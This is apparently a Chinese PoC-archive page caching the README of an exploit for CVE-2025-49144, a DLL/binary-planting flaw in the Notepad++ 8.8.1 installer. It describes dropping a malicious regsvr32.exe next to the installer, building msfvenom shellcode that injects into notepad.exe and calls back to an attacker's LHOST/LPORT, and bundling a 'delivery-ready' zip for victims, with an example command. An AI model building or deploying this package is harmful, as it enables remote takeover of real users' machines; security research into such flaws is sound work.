POC详情: 249479d609f719d7cb7053e48675ad83b2dee3d2

来源
关联漏洞
标题: Notepad++ 安全漏洞 (CVE-2025-49144)
描述:Notepad++是中国台湾侯今吾(Don Ho)个人开发者的一款开源的纯文本编辑器。 Notepad++ 8.8.1及之前版本存在安全漏洞,该漏洞源于安装程序存在不安全可执行文件搜索路径导致权限提升。
描述
Proof of Concept (PoC) that exploits the CVE-2025-49144 vulnerability in the Notepad++ 8.8.1 installer. 
介绍
# CVE-2025-49144 – Exploit for Notepad++ 8.8.1

This repository contains a functional Proof of Concept (PoC) that exploits the **CVE-2025-49144** vulnerability in the **Notepad++ 8.8.1 installer**. The malicious execution occurs by placing a binary (`regsvr32.exe`) in the same directory as the vulnerable installer. When the installer is executed, it inherits the context and triggers the payload.

> ⚠️ **Disclaimer**  
> This code is strictly intended for **educational and research purposes** only. Unauthorized use on systems without explicit permission may constitute a violation of the law.  
> The author is **not responsible** for any misuse or malicious activity involving this tool.

---

## 🧪 Requirements

- Python 3.x  
- [`msfvenom`](https://www.metasploit.com/) (part of Metasploit Framework)  
- `mingw-w64` (`x86_64-w64-mingw32-gcc`)  
- Vulnerable installer: `npp.8.8.1.Installer.x64.exe` (must be placed manually in the same directory)

---

## ⚙️ Usage

```bash
python3 exploit.py -i <LHOST> -p <LPORT>
```

Example:

```c
python3 exploit.py -i 192.168.100.10 -p 4444
```

This will generate the following files:
- regsvr32.exe: executable that injects shellcode into a remote notepad.exe process.
- notepad_payload.zip: delivery-ready archive containing:
    - npp.8.8.1.Installer.x64.exe
    - regsvr32.exe

## 🎬 Demo

[![Demo Preview](assets/cve-2025-49144.gif)]
文件快照

[4.0K] /data/pocs/249479d609f719d7cb7053e48675ad83b2dee3d2 ├── [4.0K] assets │   └── [4.2M] cve-2025-49144.gif ├── [4.3K] CVE-2025-49144.py ├── [6.5M] npp.8.8.1.Installer.x64.exe └── [1.4K] README.md 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。